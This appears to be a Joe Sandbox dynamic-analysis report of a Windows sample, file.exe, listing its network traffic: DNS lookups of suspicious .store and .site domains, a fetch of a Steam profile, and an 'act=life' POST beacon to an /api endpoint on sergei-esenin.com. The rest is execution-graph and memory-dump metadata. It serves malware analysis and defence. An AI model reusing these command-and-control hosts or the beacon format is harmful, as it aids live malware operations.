Oct 21, 2024 09:06:03.687633991 CEST	443	49705	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.792932034 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.792951107 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:03.793029070 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.793430090 CEST	49706	443	192.168.2.5	172.67.206.204
Oct 21, 2024 09:06:03.793442965 CEST	443	49706	172.67.206.204	192.168.2.5
Oct 21, 2024 09:06:04.374406099 CEST	49706	443	192.168.2.5	172.67.206.204

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 09:06:00.411693096 CEST	63283	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.421463013 CEST	53	63283	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:00.424694061 CEST	61400	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.433746099 CEST	53	61400	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:00.434979916 CEST	56914	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.443686008 CEST	53	56914	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:00.467683077 CEST	58291	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.484469891 CEST	53	58291	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:00.487215042 CEST	63129	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.497003078 CEST	53	63129	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:00.499329090 CEST	54921	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.508943081 CEST	53	54921	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:00.511158943 CEST	59805	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.520370007 CEST	53	59805	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:00.522526979 CEST	49842	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.531462908 CEST	53	49842	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:00.535816908 CEST	62266	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:00.543044090 CEST	53	62266	1.1.1.1	192.168.2.5
Oct 21, 2024 09:06:02.898261070 CEST	60771	53	192.168.2.5	1.1.1.1
Oct 21, 2024 09:06:02.911401987 CEST	53	60771	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 21, 2024 09:06:00.411693096 CEST	192.168.2.5	1.1.1.1	0x7d1a	Standard query (0)	clearancek.site	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.424694061 CEST	192.168.2.5	1.1.1.1	0x3a15	Standard query (0)	mobbipenju.store	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.434979916 CEST	192.168.2.5	1.1.1.1	0xac09	Standard query (0)	eaglepawnoy.store	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.467683077 CEST	192.168.2.5	1.1.1.1	0xcf5	Standard query (0)	dissapoiznw.store	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.487215042 CEST	192.168.2.5	1.1.1.1	0xc87	Standard query (0)	studennotediw.store	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.499329090 CEST	192.168.2.5	1.1.1.1	0xeed8	Standard query (0)	bathdoomgaz.store	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.511158943 CEST	192.168.2.5	1.1.1.1	0xccea	Standard query (0)	spirittunek.store	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.522526979 CEST	192.168.2.5	1.1.1.1	0xbe51	Standard query (0)	licendfilteo.site	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.535816908 CEST	192.168.2.5	1.1.1.1	0xa5f0	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:02.898261070 CEST	192.168.2.5	1.1.1.1	0x365f	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 21, 2024 09:06:00.421463013 CEST	1.1.1.1	192.168.2.5	0x7d1a	Name error (3)	clearancek.site	none	none	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.433746099 CEST	1.1.1.1	192.168.2.5	0x3a15	Name error (3)	mobbipenju.store	none	none	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.443686008 CEST	1.1.1.1	192.168.2.5	0xac09	Name error (3)	eaglepawnoy.store	none	none	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.484469891 CEST	1.1.1.1	192.168.2.5	0xcf5	Name error (3)	dissapoiznw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.497003078 CEST	1.1.1.1	192.168.2.5	0xc87	Name error (3)	studennotediw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.508943081 CEST	1.1.1.1	192.168.2.5	0xeed8	Name error (3)	bathdoomgaz.store	none	none	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.520370007 CEST	1.1.1.1	192.168.2.5	0xccea	Name error (3)	spirittunek.store	none	none	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.531462908 CEST	1.1.1.1	192.168.2.5	0xbe51	Name error (3)	licendfilteo.site	none	none	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:00.543044090 CEST	1.1.1.1	192.168.2.5	0xa5f0	No error (0)	steamcommunity.com		23.199.218.33	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:02.911401987 CEST	1.1.1.1	192.168.2.5	0x365f	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false
Oct 21, 2024 09:06:02.911401987 CEST	1.1.1.1	192.168.2.5	0x365f	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	23.199.218.33	443	6160	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 07:06:01 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-21 07:06:02 UTC	1891	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://ste [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 21 Oct 2024 07:06:02 GMT Content-Length: 34508 Connection: close Set-Cookie: sessionid=a4cdda5b12e9df30b4a178ba; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd883ccb3237fa39d2837163d0f38217b; Path=/; Secure; HttpOnly; SameSite=None
2024-10-21 07:06:02 UTC	14493	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-21 07:06:02 UTC	10083	IN	Data Raw: 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 Data Ascii: etY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Me
2024-10-21 07:06:02 UTC	9932	IN	Data Raw: 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 Data Ascii: assets\/","STORE_CDN_URL":"https:\/\/store.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/community.steamstatic.com\/public\/shared\/","COMMUNITY_BASE_URL":"https:\/\/steamcommunity.com\/&quot

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	172.67.206.204	443	6160	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 07:06:03 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-21 07:06:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-21 07:06:03 UTC	560	IN	HTTP/1.1 403 Forbidden Date: Mon, 21 Oct 2024 07:06:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNrqG1Ny4pdC4g1jvM3pI%2BuP5s0Jl%2BE5McRm4GzRsCMQPBiH%2FCa69OWwbi396sxYJZyyCdpRgTAgx5RjrZjnI9KAQpFhGxB4sFyMxwhYif3RPnxGhJoXyCiqBJNYRPn9SkYCcQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d5f671caf9c477e-DFW
2024-10-21 07:06:03 UTC	809	IN	Data Raw: 31 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1154<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-21 07:06:03 UTC	1369	IN	Data Raw: 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 Data Ascii: i/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementB
2024-10-21 07:06:03 UTC	1369	IN	Data Raw: 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: s-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-10-21 07:06:03 UTC	897	IN	Data Raw: 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e Data Ascii: </span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landin
2024-10-21 07:06:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:05:58
Start date:	21/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xcc0000
File size:	2'947'584 bytes
MD5 hash:	7F65BD0A030AAF1F091FCCBC602A321C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	49.3%
Total number of Nodes:	67
Total number of Limit Nodes:	9

Executed Functions

Function 00D050FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(19A41BB1,00000000,00000800), ref: 00D05182

Strings

<I$), xrefs: 00D05198
@^, xrefs: 00D05120
<I$), xrefs: 00D052E3

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: LibraryLoad
String ID: <I$)$<I$)$@^
API String ID: 1029625771-935358343
Opcode ID: 549ba4d5ea97cd20cb384a3200febf4ef64953bcba455cc50e2f4249cec5dd0e
Instruction ID: c5ab3abe72e7d7c6c6e859b1ee5869909591add9f67ba40db25655ecf8fcc36e
Opcode Fuzzy Hash: 549ba4d5ea97cd20cb384a3200febf4ef64953bcba455cc50e2f4249cec5dd0e
Instruction Fuzzy Hash: 95219F355083849FC300DF68E88176AB7E4AB6A300F69882CE5C5D7391DA75DA15CF66

Function 00CCFCA0 Relevance: 6.6, Strings: 5, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

VY^_, xrefs: 00CCFDFF
t, xrefs: 00CCFCBE
zPVoDl4KvD21.aZjxaNf9E9zC2F4K1Tgv0o8Qud2IV0-1729494363-0.0.1.1-/api, xrefs: 00CD0137, 00CD0154
J|BJ, xrefs: 00CD000D
V, xrefs: 00CCFEDC

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
